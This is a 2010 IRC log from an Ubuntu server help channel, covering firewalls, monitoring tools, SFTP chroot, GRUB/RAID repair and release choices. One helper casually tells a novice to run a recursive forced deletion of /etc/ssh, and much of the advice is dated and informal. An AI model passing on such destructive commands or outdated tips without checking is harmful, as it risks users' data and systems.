<patdk-wk> ufw is just a script that runs iptables stuff
<jdstrand> ufw uses iptables
<demonspork> wow, everything is hiding iptables
<demonspork> lol
<patdk-wk> though, ufw is just raw iptables commands though :)
<patdk-wk> iptables is nice, but you can easily cause interactions between rules you didn't intend
<demonspork> yeah, I am writing any rules I add for a specific IP and then applying them more broadly once I have confirmed they do what I intend on that IP
<patdk-wk> plus, when you get more complex, it's nice to hide iptables,ebtables,xtables,ipset, ... :)
<demonspork> I could do this sooo much faster if I would just stop playing minecraft for a few minutes
 * patdk-wk doesn't understand people that play games
<demonspork> but since my server isn't making any money yet, the most useful thing it does is run a minecraft server
<demonspork> lol
<demonspork> minecraft is like LEGO: Online
<demonspork> it also is written in java and has a horribly optimized server
<demonspork> 15 users = 100% CPU utilization. And it can't multithread, so I am stuck with a single core of a single CPU
<_Techie_> is there any major security flaws with webmin, that i should be worried about... im already making it so that you cant access the port directly, and forcing SSL on all connections
<demonspork> patdk-wk, is it usable to install munin from the repository or should I download it and install it myself
<euxneks> Hello, I would like to add another RAID array to my server, but I've never done this before. I have already added the two new drives and would like to set up RAID1
<euxneks> I seem to have already created one :)
<ruben23>  hi guys how do i check my ubuntu version installed on my system..?
<delimiter> cat /etc/issue
<demonspork> I have an iso from HP with some extra software for my HP server, it apparently is a package repo, so how do I add it to my sources.list properly to be used
#ubuntu-server 2010-10-02
<euxneks> dang, now my server is hanging on "modprobe: FATAL: error inserting padlock_sha"
<euxneks> nevermind, found a thread with a solution: http://ubuntuforums.org/showthread.php?t=1521336
<uvirtbot> New bug: #644009 in nagios3 (main) "package nagios3-common 3.0.6-2ubuntu1.1 failed to install/upgrade: subprocess post-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/644009
<sorush20> hi
<sorush20> I'm installing joomla, I need to know how to install ftp..
<demonspork> sorush20, best is to use sftp
<demonspork> it might already be there unless I missed something when I was installing my server
<demonspork> I never installed it but I use it all the time
<uvirtbot> New bug: #647600 in mysql-dfsg-5.0 (universe) "package mysql-server-5.0 (not installed) failed to install/upgrade: subprocess new pre-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/647600
<qman__> demonspork, sftp is part of openssh
<qman__> it is not installed by default
<demonspork> ah, I guess I did set up openssh-server
<demonspork> I didn't think of that
<demonspork> in the meantime, I am trying like 5 different monitoring and graphing solutions and I have been dissappointed by all of them thus far
<demonspork> I Can't even get munin to work~~`
<qman__> in any case, FTP is always a bad idea
<qman__> see: http://mywiki.wooledge.org/FtpMustDie
<qman__> just so you know, SNMP is not secure and should only be used on physically secured networks
<qman__> it doesn't open any holes by itself, but it gives an attacker every bit of information it gives you
<qman__> basically, SNMP shouldn't leave the server room, and definitely shouldn't be used on the same network as any wireless access points
<qman__> as far as suggestions for software to use, I don't use any on my network, but I've used nagios in the past to decent effect
<qman__> I wasn't impressed with cacti
<demonspork> yeah, it is implemented on localhost
<demonspork> see, my issue is that I am on a single server that I simply would like to monitor the local network port usage, generate some simple graphs about it and generate some graphs of CPU usage
<demonspork> all of these monitoring systems are like YEAH WE CAN TALK WITH LIKE 200 DIFFERENT SERVERS AT ONCE AND SEE WHAT IS GOING ON BETWEEN THEM AND YOU CAN HOOK ME UP TO YOUR REFRIGERATOR AND GRAPH THE TEMPERATURE
<demonspork> NO
<demonspork> DO NOT WANT
<qman__> well, that's what they're for
<qman__> aggregate statistics
<qman__> you just want to monitor one server
<demonspork> yeah
<qman__> for network usage, I use vnstat with the php frontend
<demonspork> can that differentiate between usage on connections on different IP addresses on the same physical adapter?
<qman__> no, vnstat is for total bandwidth used
<qman__> there are other softwares though for per-IP usage
<qman__> trying to think of one in particular
<demonspork> so I just spent like 2 days looking at stuff that is waaay more powerful than what I need, but at least the exposure could be useful in a year or 2
<demonspork> damnit, I just found an article with a list of what I need
<demonspork> now I at least know the stuff to stay away from
<demonspork> how do I gather data about how bad my host's static DNS is?
<demonspork> hmm, nvm
<demonspork> it looks like they may have actually fixed it
<demonspork> when I first installed this server, I set up their static DNS, supposedly on site servar, for lookups. The lookups took 4-5 seconds to complete, especially reverse lookups, so a lot of things that use reverse lookups would just time out during login
<demonspork> I quickly changed to 8.8.8.8 and 8.8.4.8, google's servars
<demonspork> just because they was easy to remember
<demonspork> and now I am testing them out, and their servers seem to be responding quickly now, within 0.016 seconds per lookup
<demonspork> with the known previous issue, should I probably just stick with the google DNS or should I switch back to the on site and just write a script that checks the response time every 10 minutes and switches back to the google DNS if it takes too long for response?
<demonspork> is the extra .05ms worth it?
<uvirtbot> New bug: #653357 in samba (main) "package samba-common-bin 2:3.4.7~dfsg-1ubuntu3.2 failed to install/upgrade: subprocess installed post-installation script returned error exit status 2" [Undecided,New] https://launchpad.net/bugs/653357
<Dravekx> I chrooted my users in their home directories. why would that cause php to stop working?
<uvirtbot> New bug: #653362 in dovecot (main) "package mail-stack-delivery 1:1.2.12-1ubuntu7 failed to install/upgrade: subprocess new pre-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/653362
<SpamapS> seems like dovecot has a ton of bugs lately
<Patrickdk> heh, googles dns servers cache the crap out of things, way more than I think they should
<SpamapS> Patrickdk: they're pre-caching
<Patrickdk> SpamapS, what version of dovcot?
<SpamapS> Patrickdk: they've publicly stated lately that they are trying to cache nearly the entire DNS map.
<Patrickdk> oh, 1.2.12
<Patrickdk> SpamapS, ya, I'm always getting stale as crap responses from google dns
<demonspork> Dravekx, because the PHP binaries and all of the dependencies of such must be inside the chroot, there is no way for the user to use them unless they can see the binaries
<Patrickdk> so I don't use them anymore
<SpamapS> Patrickdk: stale? they're not stale if they're inside the TTL
<SpamapS> wtf.. AT&T isn't letting my tethered android t-mobile phone connect on port 443. How lame.
 * SpamapS is so happy they allow port 22
<RoAkSoAx> kirkland: ping?
<uvirtbot> New bug: #653370 in mysql-dfsg-5.1 (main) "package mysql-server-5.1 5.1.41-3ubuntu12.3 failed to install/upgrade:" [Undecided,New] https://launchpad.net/bugs/653370
<RoyK> imho there is one reason not to use ubuntu - zfs
<zanthir> Hello?
<zanthir> I screwed up my OpenSSH-server install and would like to start over. Is there a command for that? Something like 'sudo aptitude uninstall openssh-server' or something?
<RoyK> apt-get remove --purge ssh
<zanthir> sweet
<zanthir> You're my hero royk!
<RoyK> then just rm -rf /etc/ssh just to make sure it's gone
<zanthir> sure
<zanthir> what does the -rf argument mean?
<RoyK> man rm
<zanthir> oh, right.
<zanthir> huh?
<RoyK> -r == recursive, -f == force
<RoyK> apt-get install ssh will recreate that part
<zanthir> should I do that, or open ssh?
<RoyK> if you don't want to remove it, move it somewhere else
<RoyK> if you're on a remote site, be careful
<zanthir> I'm not. I'm at home.
<RoyK> if you have local accesss to the box, no probs
<zanthir> Right. That's the case.
 * RoyK rarely tells people to do destructive things
<zanthir> *shrug*
<zanthir> Worst case, I start over from scratch. I haven't set anything up successfully yet. Lol.
<RoyK> dpkg/apt can be picky sometimes
<zanthir> I'm using openssh-server instaed of ssh. You meant that though, right?
<RoyK> anyway - if apt dosn't generate new ssh keys, you can do it yourself
<RoyK> ssh is an alias
<zanthir> oh.
<zanthir> so either would have worked, even for the dir?
<RoyK> just remember --purge to remove the old bits
<zanthir> right, did it. Seems to have worked.
<zanthir> testing now.
<zanthir> hey, it worked!
<RoyK> :)
<zanthir> I mean, it would have worked the first time if I wasn't trying so hard, lol. I was following some guide and went in and was changing settings around, which I later found out is unnecessary, that it just works out of the box.
<zanthir> Yup, totally works. Thanks again.
<RoyK> np
<Dravekx> when I have package updates and security updates, which is recommended: aptitude or apt-get?
<qman__> either is fine, the recommendation is to pick one and stick with it for everything
<qman__> most people here use and will supply help using apt-get
<demonspork> woo, I just install the hp utilities for monitoring my ProLiant server
<knolls> i'm installing ubuntuserver right now, i selected to install security updates automatically.. anyone think that might be a problem?
<demonspork> I CAN FINALLY SEE TEMPERATURE INFO
<demonspork> knolls, I usually don't simply to keep kernel updates out until I am ready for some downtime for restarts, I don't know for certain but I am pretty sure it is not a good idea to install a kernel update and then not restart the computer with the new kernel for a year
<Dravekx> knolls, i always use manual. Someone once told me it wasn't wise to auto install updates. I'm not sure if that is correct, but manual works for me.
<qman__> demonspork, it has no effect
<qman__> newly installed kernels simply won't be used until reboot
<knolls> demonspork: Dravekx: manually doing it works for me too, i thought that 'security updates' would never include anything that makes me reboot
<qman__> it isn't wise to auto install updates if you're in an environment where downtime is not an option
<demonspork> yeah, but what about the kernel headers, when you build stuff against the kernel can it cause issues when the new headers are already installed but the new kernel isn't in place
<qman__> however, for me, automatic updates are the better choice
<qman__> because doing it manually, I tend to be lazy and forget to do it
<knolls> downtime isn't a problem, as long as it's back up without any issues that i need to spend time sorting out
<qman__> demonspork, you shouldn't be building stuff on a production server anyway
<demonspork> good point
<demonspork> how much of a performance hit is a pae kernel instead of generic or something?
<qman__> significant for high performance computing, such as gaming or crunching numbers
<qman__> but for most uses the extra RAM is worth the hit
<demonspork> well, I have 3GB of ram and the installer automatically gave me a PAE kernel
<demonspork> I didn't even think about it
<demonspork> ~~`
<qman__> it does on all systems by default now
<demonspork> k
<Dravekx> I found this: aptitude will automatically install "recommended" packages, while apt-get only installs "depended" packages. So with aptitude you might get a bit more bulk/features.
<qman__> at least every system I've tried, regardless of how much RAM is available or can be installed
<qman__> Dravekx, that's an option for both
<demonspork> I run a minecraft server and then a multithreading cartographer image generator that takes 5 hours to run with 3 threads. The minecraft server can only run a single thread, so would moving away from a PAE kernel help me when the minecraft server is at 100%
<qman__> apt-get --no-install-recommends
<Dravekx> ahh. thx
<qman__> I think -R is synonymous, but double check
<qman__> it's also configurable in /etc/apt
<demonspork> because I can't get more than the 3GB in this server
<qman__> demonspork, you'll probably see a minor performance gain with non-PAE, but you'd have to measure to check
<qman__> worth trying in my opinion
<demonspork> so how do I measure?
<qman__> choose a given task that takes considerable, consistent time to do
<qman__> time it with the time command
<demonspork> the next image generation starts in 4.5 hours
<qman__> install the other kernel, boot from it, repeat
<demonspork> oh, consistent time
<demonspork> darn
<demonspork> do you have any good examples of tasks
<qman__> that would be the only way to get accurate results
<qman__> you could just switch and see anecdotally if it helps
<qman__> you can always switch back
<demonspork> yeah, but it is unlikely that anything will break?
<qman__> yeah, you only have 3GB of RAM anyway
<demonspork> ok, so I am going to include that in my downtime soon
<qman__> unless you have some other device that requires significant address space
<qman__> if you had exactly 4GB, you'd lose some
<qman__> but not with 3GB
<demonspork> k
<qman__> the way it works is, you only have 4GB of addressable space, so that includes RAM and all other devices that need to be addressed like memory
<qman__> some applications have a lot more than RAM, but typical PCs don't have more than 512MB of 'other' stuff
<demonspork> well, now that I am monitoring my total bandwidth usage I can figure out if I am safe moving to the faster, metered port for my server
<demonspork> :)
<demonspork> I can also tell the temperature of my server
<demonspork> but I can't get the HP management interface to work
<demonspork> I don't even know where any config files are for it
<demonspork> the hpsmh thing
<demonspork> I don't know where to find documentation on running it
<qman__> yeah, I've got a compaq proliant, never figured out how to really do anything with the tools beyond installing them
<qman__> it quieted the fans down, good enough for me
<demonspork> oh shiii, would it
<demonspork> damnit
<qman__> went from hearing damage to vacuum cleaner
<demonspork> I could have put this server in a closet on a T1 --- for free --- if it had been quiet enough
<qman__> still not something you want to sit next to for extended periods
<demonspork> when I had it sitting in my basement while I was configuring it I wore noise cancelling headphones when it was on
<demonspork> ahaha
<demonspork> RED, the movie, looks awesome
<uvirtbot> New bug: #653405 in rabbitmq-server (main) "package rabbitmq-server 1.7.2-1ubuntu1 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/653405
<tacomaster> can you point a dns server to its self as a nameserver?
<qman__> yes
<tacomaster> ok ty
<Dravekx> anyway to jail users with access to php so chroot is their userdir public_html?
<Dravekx> I can jai them sftp, but then php access is denied.
<Dravekx> jail*
<qman__> that's because php runs as www-data
<qman__> I'd suggest jailing them to their home directory, and having them cd into public_html
<Dravekx> qman__, I have them jailed at the moment, but they can cd all around the system.
<qman__> then they're not jailed
<Dravekx> maybe not 'jailed'
<Dravekx> yeah. hmm.
<Dravekx> qman__, should I use jailkit? Im looking for a good secure way to accomplish this.
<qman__> no, it's overcomplicated now that ssh has it built in
<Dravekx> ok
<Dravekx> qman__, what do I set the user's shell to? it says /bin/false... but that isnt right.
<qman__> that won't work with ssh, you need /usr/sbin/nologin
<Dravekx> ah
<Dravekx> almost.. getting the BASH error again.
<qman__> did you change the 'subsystem' line to internal-sftp?
<Dravekx> lol no.
<qman__> #Subsystem sftp /usr/lib/openssh/sftp-server
<qman__> Subsystem sftp internal-sftp
<_Techie_> when recreating the grub.cfg, is the command sudo update-grub2 ?
<qman__> IIRC sudo update-grub
<Dravekx> qman__, yeah.. got it. :) nice! it works.
<Dravekx> php is working too, which is odd. It wasnt before.
<demonspork> woo, final setup that does everything I want (except temperatures, because custom HP softwares) is Splunk for monitoring logs, events, processes, netstat and stuff, and BandwidthD for reporting on bandwidth usage on a per IP basis
<demonspork> now I just need to write some codes that will generate reports that Splunk can use or monitor
<Dravekx> I've heard good things about Splunk.
<Dravekx> I love the tagline too. lol
<Dravekx> "Finding your faults just like mom."
<demonspork> yeah, I was warned ahead of time that they won't stop trying to contact you when you sign up to download
<demonspork> like call the number you are required to give
<demonspork> and they have already sent like 3 emails to the account I signed up with
<demonspork> now I need to find out what options get disabled when switched to the free
<Dravekx> sounds like Microsoft when you download any of their trials.
<demonspork> so, how do I make it so that not just anyone can connect to my splunk once the enterprise trial runs out?
<uvirtbot> New bug: #653424 in rabbitmq-server (main) "apport bug reports for rabbitmq should include /var/log/rabbitmq/startup_log" [Undecided,New] https://launchpad.net/bugs/653424
<qman__> good question
<qman__> since it doesn't use apache (I'm guessing?) I'd resort to a firewall rule only allowing connections from your computer
<qman__> if that's not acceptable you could install a proxy, and only allow connections from that, and use htpasswd authentication on the proxy
<qman__> or you could make it only allow connections from localhost, then use an ssh tunnel
<demonspork> qman__, the ssh tunnel is the one I hadn't thought of yet, thank you
<demonspork> GAH, COMPUTERS: HOW DO THEY WORK
<Dravekx> demonspork, you start,it works for a while (if you make it that far), it fails, and you start over. welcome to computers. :)
<Dravekx> the thing I hate, is when you read and follow something, then it fails because the 'information' was invalid... so then you are stuck with garbage all over your server. LOL
<demonspork> lol
<toolbox> hi i am having some problems with fetchmail daemon can anyone advise?
<knolls> when a particular domain name is sent to my hosting server, is there a way to open the site in a particular folder inside of /var/www instead of going directly to /var/www?
<knolls> i'm using ubuntu-server with apache2 php5 sql-server and webmin is installed and working too
<qman__> knolls, that's done with your virtualhost configuration
<qman__> to have a site show up based on domain name, use <Virtualhost www.example.com:80>
<qman__> also
<qman__> !webmin
<ubottu> webmin is no longer supported in Debian and Ubuntu. It is not compatible with the way that Ubuntu packages handle configuration files, and is likely to cause unexpected issues with your system. See !ebox instead.
<_Techie_> if you however do still choose to use webmin
<_Techie_> never cloes the window while installing updates
<_Techie_> close*
<knolls> tyvm qman__ & _Techie_
<uvirtbot> New bug: #653499 in lm-sensors (universe) "sensors report temperature of only one core" [Undecided,New] https://launchpad.net/bugs/653499
<kinygos> hi..i wonder if anyone could spare a few moments...i've been trying to install RAID on my remote server which has no access to external media, but came with a 2nd physical disk in the box (not partitioned or mounted)...i've partitioned the second disk to match the first, configured degraded raid partitions on in, mounted each partition and copied all data across...i'm now struggling to install grub with Error 15
<kinygos> i'm at a loss as to where to turn...the / partition on my raid image contains /boot/grub/stage1...but clearly grub cannot see it...am i trying to install grub at the wrong time?
<qman__> I'm not sure with grub2, but with grub1 you had to change the config to match the new disk configuration
<kinygos> i've pasted output from mount, fdisk -l, and the errors i get with grub to http://dpaste.com/251965/
<kinygos> qman__: it is grub 1 i'm trying to use....do you mean the grub config?
<qman__> grub2 is the default since karmic
<qman__> not a big fan myself, but that's beside the point
<qman__> pretty sure grub needs to know your new root disk in the config
<qman__> the UUID
<kinygos> grub-install -v tells me i'm running version 0.97 :(
<kinygos> so legacy grub
<qman__> ah
<qman__> well then, you need to change the root= in /boot/grub/menu.lst to your raid device
<qman__> it's (presumably) set to the UUID of /dev/sda right now
<qman__> then sudo update-grub, and reinstall it to the mbr
<kinygos> qman__: thank you very much :) i'm looking at menu.lst now...
<qman__> it's a risky move without physical access though
<qman__> if it doesn't work you'll have to have them fix it for you
<kinygos> i have a lights out box with remote access...i won't touch the file on sda, only the one on my raid
<qman__> ah, should be fine then
<qman__> you can always manually edit the menu for one-time boot to recover
<RoyK> kinygos: still fighting, are you? :)
<RoyK> kinygos: tried chrooting into /raid yet before installing grub?
<kinygos> RoyK: i am indeed :(  i did...but when i do that, it says it doesn't invalid device request
<kinygos> RoyK: sorry, it says the Selected Disk does not exist when i try to root (hd1)
<RoyK> is /proc mounted in the chroot?
<RoyK> chroot /raid; mount /proc; grub-install ....
<kinygos> it is, but it's empty!!
<RoyK> then it's not mounted
<kinygos> lol
<RoyK> mount /proc and try again
<kinygos> woah....
<kinygos> that's a new one on me...didn't know i had to do that...it's not got lots of stuff in it :)  brb
 * RoyK shrugs
<kinygos> same issue :( root (hd1,5), Error 21: selected disk does not exist
<RoyK> kinygos: pastebin cat /proc/partitions
<kinygos> RoyK: http://dpaste.com/251977/
<RoyK> kinygos: what is the grub-install commandline you're using?
<kinygos> i wasn't using grub-install...i was entering grub to get a grub prompt, then entering 'root (hd1,5)
<RoyK> use grub-install /dev/sdb
<kinygos> ok
<kinygos> brb
<kinygos> /dev/sdb: Not found or not a block device
<RoyK> /etc/init.d/udev start
<kinygos> same error on grub-install
<RoyK> or just install it from outside the chroot
<RoyK> it shouldn't be a problem
<kinygos> ok...one sec
<RoyK> /dev/sdb is in /proc/partitions, so it should be there indeed
<kinygos> ok, no error reported, and confirmation that (hd1) is /dev/sdb...
<kinygos> i'll try and boot off that disk
<kinygos> :(
<RoyK> didn't work?
<kinygos> i don't think so, now
<kinygos> *no
<RoyK> can't you just go there and insert an ubuntu CD yourself?
<kinygos> on boot up, grub listed the uuid of for hd0
<RoyK> change the uuid to the device name (/dev/mdsomething)
<kinygos> RoyK: unfortunately not :(  i've asked if they can just keep a disk in there for me with the cd on lowest boot priority
<RoyK> the uuid will be different on a new filesystem
<kinygos> i did that on the menu.lst in the raid partition
<RoyK> add a new entry on the current grub install with the mdsomething partition
<kinygos> ok
<kinygos> and select it from the grub boot menu...ok
<kinygos> bizarre, my raid partitions are not mounted...they were when i previously connected
<kinygos> cd ..
<kinygos> (lol..oops)
<RoyK> kinygos: you have rebooted .... if they aren't in /etc/fstab, they won't be mounted automatically
 * RoyK sends kinygos to a linux newbies course
<kinygos> RoyK: ah, rebooted...lol, i only logged out last night :)
<RoyK> kinygos: no, you just tried to reboot the host where you're trying to make this raid thing
<kinygos> RoyK: my raid partitions have been renamed...now they're /dev/md_d5 instead of /dev/md5...
<kinygos> RoyK: does that suggest that i've made a blunder somewhere?
<RoyK> do you have /etc/mdadm.conf in there?
<RoyK> IIRC that's deprecated
<kinygos> i have /etc/mdadm/mdadm.conf... http://dpaste.com/251986/
<RoyK> wierd
<RoyK> I've seen that come up earlier, though
<kinygos> /dev/md5 is mysteriously missing from there, but they are all called /dev/md_d6 according to fdisk -l
<RoyK> try changing the grub config to use those UUIDs
<RoyK> never mind the device names
<kinygos> ok
<kinygos> hmm, those uuid's have a different format to those in /boot/grub/menu.lst
<RoyK> try it anyway
<RoyK> or perhaps try to remove the :'s
<kinygos> menu.lst has 51a0c59f-d9bf-4728-bfa3-eb5edaadc93c, mdadm.conf has 890e84df:49191669:92060f38:876c2921
<RoyK> iirc the uuid is just a string
<RoyK> http://en.wikipedia.org/wiki/Uuid
<kinygos> rebooting now
<kinygos> ok, selected the entry i created, it says file not found :(
<kinygos> there should have been an entry in mdadm.conf for /dev/md5
<kinygos> that's the /boot partition in the raid
<kinygos> sorry...that's the partition that was mounted on /boot in the raid
<RoyK> sorry, I don't think I can be of much more help.....
<kinygos> RoyK: you've been very helpful though...i have learnt a few things...i really appreciate your help and efforts
<RoyK> :)
<RoyK> kinygos: my advice is to go to the datacentre and install the box with 10.04 by hand
<RoyK> kinygos: you've spent days trying to figure out this, and may possibly spend more days without much success
<kinygos> RoyK: indeed, and leave the cd in the drive for future use :)
<RoyK> indeed
<RoyK> they probably won't charge you much as long as you do the work yourself
<RoyK> but then, they might tell you 'it's not supported by them', but screw that
<kinygos> indeed...although i have a long way to go before the server is ready for my application, and i may need a rebuild....i mean, i have to create users, install and configure apache, install and configure postgresql...
<RoyK> There are two types of sysadmins, one that wants everything supported so that (s)he can blame someone when something goes wrong, and the other, that just sets up systems that don't fail that easily, and that knows what to do when they fail
<kinygos> i don't like logging into the server with root
<RoyK> kinygos: just learn as you go
<kinygos> RoyK: i've learnt so much in the last week, really good stuff, and the people in this channel are awesome :)
<RoyK> :)
<RoyK> also, read through the bits you need in the ubuntu server guide
<RoyK> it's quite good
<kinygos> i'm totally on my own here with the technology in the business...and i'm a developer at heart
<kinygos> omg...i didn't realise that was available online !!
<RoyK> well, unix (or linux) may seem hard from someone that doesn't understand it, I know that, but once you understand how it works, it's quite nice to work with
<RoyK> hehe
<kinygos> i've already seen that (even though i've not had so much success with raid)
<RoyK> everything is online these days :D
 * RoyK installed his first linux box back in 1994 and most stuff wasn't very online at that time..
<kinygos> anyways, RoyK, i've taken too much of your time today, i'm going to try a few more things and probably be back here tonight again
<kinygos> i installed my first one around then too, on a sun box, was challenging...compiling the kernel to get apache in there...blimey
<RoyK> kinygos: if you can take a few hours free monday, got to the datacentre and install the box from scratch. it will save you a lot of headache
<kinygos> indeed...i do feel like i'm close though...
<kinygos> and will be so gratifying if i manage it :)
<RoyK> I've seen that md device naming problem somewhere before
<RoyK> google for it
<kinygos> i will indeed
<kinygos> RoyK: lol..it gets better...i have a sneaking suspicion that the server doesn't have a cd-rom drive...i'll need to use a usb memory stick!!
<RoyK> kirkland: you can probably use an usb cdrom
<RoyK> or even burn the iso to a stick
<pankaj_sharma> anyone here
<RoyK>  
<pankaj_sharma> can anyone give me the link for how to setup mailserver
<RoyK> !guide
<RoyK> pankaj_sharma: the ubuntu server guide has a few things about that
<pankaj_sharma> telnet smtp.google.com 25 why doesnt this work?
<lnsk>  hi,i had setup a djbdns resolver in my machine. how can i add some static entries to the dnscache ?
<c3l> If I want to run ubuntu on my server. is it smarter to go with the 10.04 LTS, than the newer 10.10 soon released? Im probably not going to reinstall it frequently, so having lts is nice, but do I still get all software updates etc.?
<ScottK> c3l: You will get security updates and important bug fixes on 10.04, but that's it.
<ScottK> The point of having a release is to give people a stable system to use, so we don't generally update it.
<ScottK> There are sometimes new versions of packages available in backports.
<incorrect> best dynamic dns service for a server?
<ScottK> !backports
<ubottu> If new updated Ubuntu packages are built for an application, then they may go into Ubuntu Backports. See https://help.ubuntu.com/community/UbuntuBackports - See also !packaging
<ScottK> incorrect: Really no such thing.  Best not to need dynamic DNS for a server.
<c3l> ah, so no newer versions of software, only bug and security fixes?
<incorrect> ScottK, true, however i am being a cheap stake and moving to a broadband service with no static ips
<ScottK> Yes.
<ScottK> incorrect: No idea then.  Dynamic DNS can never get but so good.
<incorrect> well there have been plenty of services that have worked
<ScottK> c3l: Except for backports (and a very few more general exceptions for bug fix updates), no.
<incorrect> just some work better than others
<incorrect> i just want to find my server easily to vpn back home
<c3l> ScottK: okay, thanks. what's recommended to run on my server, the latest lts or the latest stable?
<ScottK> c3l: The same will be true for 10.10 once it's released.  The big difference is that you can stick with 10.04 for longer without upgrading it.
<ScottK> c3l: It really depends.  Unless you really need functionality from newer releases, most people use the LTS for servers.
<RoyK> c3l: run an LTS release for a server - 10.04 is the latest - 8.04 also works well if you're worried about stability
<amarcolino> hi anyone can direct me, got two machines that I want to turn into a load balancing cluster, on them will run vm images hosting low traffic websites, any information that can be provided on how to achieve this and keep them in sync?
<amarcolino> hi anyone can direct me, got two machines that I want to turn into a load balancing cluster, on them will run vm images hosting low traffic websites, any information that can be provided on how to achieve this and keep them in sync?
<amarcolino> sorry for that
<RoyK> ScottK: security updates and bugfixes for 10.04.1, yes, but you can update to 10.04.2 with slightly more recent versions when that comes
<c3l> maybe I should look into debian too. what is your, ubuntu folks, arguments for using ubuntu rather than its parent debian?
<ScottK> RoyK: All 10.04.2 will be is the bug fix and security updates already released for 10.04.1.
<_aegis> c3l: more frequent updates
<RoyK> c3l: ubuntu and debian is basically the same, but some newer stuff are in ubuntu
<ScottK> c3l: Ubuntu is also better at proactive security changes.
<c3l> but if im going for long term stability, the more frequent dist updates wont affect me
<c3l> ooh
<RoyK> ScottK: not really - 10.04.1 will be supported, but only for bugfixes, whereas 10.04.2 will contain slightly newer code with potentially new functionality, albeit no psql9 or so
<ScottK> RoyK: No.
<ScottK> The point releases are just redone ISOs to make it possible to install without having to do a bazillion updates after install
<RoyK> ScottK: and saying that ubuntu is more proactive on bugfixes is a bold statement
<ScottK> There is no difference between (for example) a 10.04 install with all updates applied and 10.04.1 with all updates applied.
<ScottK> RoyK: That isn't what I said.
<RoyK> c3l: if in doubt, run 8.04, it works
<ScottK> If you look at https://wiki.ubuntu.com/Security/Features and then look at Debian you'll find that Ubuntu is far ahead on security features.
<c3l> RoyK: or debian :)
<ScottK> Also 10.04 is far ahead of 8.04 in terms of security features too.
<RoyK> indeed
<RoyK> c3l: I prefer ubunt myself, 8.04 on servers that I need to trust
<ScottK> So unless there is a specific issue that someone is having with 10.04, I wouldn't recommend 8.04 anymore either.
<RoyK> it's well tested - it works
<c3l> RoyK: out of curiousity, why? (inputs and thoughts from different people is always nice)
<c3l> so is debian, afaik its considered the most stable distro out there
<RoyK> c3l: 8.04 is very well tested, 10.04 has only been around for half a year
<amarcolino> anyone here can provide me information on how to approach my problem
<RoyK> debian can be a little troublesome if you need new software
<c3l> RoyK: how would you get new software on lets say 8.04?
<ScottK> For pure stability, I would agree that Debian is very good.  I wouldn't argue Ubuntu is better, but the combination of better security features and newer releases make Ubuntu a better server platform for me.
<_aegis> my 8.04 LTS system got destroyed through the upgrade to 10.04...
<ScottK> _aegis: Did you file bugs about it?
<c3l> _aegis: never do dist upgrades ;) backup and reinstall
 * ScottK has done several 8.04 -> 10.04 upgrades without issue.
<RoyK> c3l: you don't, but it's easier to ugrade to a new release than with debian, which releases a new version quite rarely
<c3l> yeah, thier release cycle is really long
<_aegis> ScottK: Didn't have a system to do that on (nor the time when I had to spend days trying to recover data)...  I did see that the problems were well documented on launchpad...
<ScottK> c3l: Why do you recommend reinstalling?  Personally the only time I've ever had problems upgrading servers is when I knew I was doing something risky.
<RoyK> just to clarify: I use 8.04 for things that needs to work and where old software works well, say dhcp or dns servers. I use 10.04 for everything else
<ScottK> _aegis: OK.  It's good you checked.
<c3l> ScottK: youre basically the first one ive talked to that have not had trouble with dist upgrades :)
<ScottK> Interesting.
<RoyK> we have 20ish servers on 10.04 - the only problem I've seen so far is that it doesn't have g77
<ScottK> My test server is running 10.10 already (upgraded from 10.04 without issue)
<c3l> oh, cool
<RoyK> I was talking about production servers, not test boxes
<ScottK> Sure.  My production systems are 10.04 all upgraded from 8.04 without trouble.
<RoyK> same here except for that little issue with g77 not being around anymore
<RoyK> but then, that's not an ubuntu thing
<RoyK> linux should have had zfs
<RoyK> or perhaps the btrfs folks should have done a little better job
<ScottK> Do we know how good a job they did yet?
<ScottK> Seems it's still a bit work in progress.
<RoyK> has been for a couple of years, yes
<RoyK> no working raid[56]
<RoyK> and the current code will rely on md for that part
<RoyK> meaning no checksumming on the device level
<arrrghhh> anyone stream video to a PS3 with their server...?  I've been doing it for a while, but I'm having issues transcoding stuff on the fly so the PS3 can play it...
<twister004> hi guys.... im using racoon, setkey and shorewall to establish VPN tunnels with my ubuntu-server.... how can i enter a DNS name for the remote VPN gateway instead of an IP?
<twister004> for instance.... in racoon.conf, 'remote <ip address> {'.... is used to define remote location
<twister004> phase 1.... is it valid to replace the ip adress with DNS?>
<twister004> please advise
<SpamapS> twister004: did you try putting the hostname in there?
<twister004> no...dont wana mess-up anything
<twister004> for racoon.conf... i can add it as remoteanonymous
<guntbert> installing with a preseed file: most settings are followed by the installer - exception: the keyboard layout , where might be the error? preseed.cfg: http://pastebin.com/5yVvy84R
<derknecht> i need a robust open source groupware solution and need a recommendation. Has someone tried simply and can tell me if it is working well?
<RoyK> derknecht: zimbra
<RoyK> it's not open in all ways, but it works well
<guntbert> installing with a preseed file: most settings are followed by the installer - exception: the keyboard layout , where might be the error? preseed.cfg: http://pastebin.com/5yVvy84R
<pankaj_sharma> someone tell me .. how to install courier-imap in ubuntu?
<guntbert> pankaj_sharma: for dovecot there is help  in the !serverguide
<pankaj_sharma> guntbert: courier is not good for imap?
<guntbert> pankaj_sharma: I didn't say that, but if you just need any imap server why not take the easy way and follow the serverguide?
<pankaj_sharma> guntbert: ok
<pankaj_sharma> !serverguide
<ubottu> The Ubuntu server guide may be found at http://help.ubuntu.com/10.04/serverguide/C/
<jforman> i am trying to figure out that while editing /etc/defaults/libvirt-binand adding an option to libvirtd_opts in that file, it is not taking affect. adding the "--listen" option doesnt seem to be working. i am runing 10.04 LTS
<derknecht> hi there. i need a groupware solution which also do the mailbox and domain configuration (like zimbra does) but will prefere a open source solution. Any suggestions? Thanks
<guntbert> installing with a preseed file: most settings are followed by the installer - exception: the keyboard layout , where might be the error? preseed.cfg: http://pastebin.com/5yVvy84R
<vsMS> Hi. I will setup luzid on my Server. I Plan to install a softraid 1. I Found some hints tha this will be a Problem. Is it really so?
<vsMS> Nobody?
<ntenisOT> hello guys anyone with experience with eucalyptus to ask a question ?
<ntenisOT> anyone?
<uvirtbot> New bug: #653738 in clamav (main) "Microversion update SRU for clamav in Lucid" [High,In progress] https://launchpad.net/bugs/653738
<uvirtbot> New bug: #653775 in samba (main) "other computers can't find my shared files" [Undecided,New] https://launchpad.net/bugs/653775
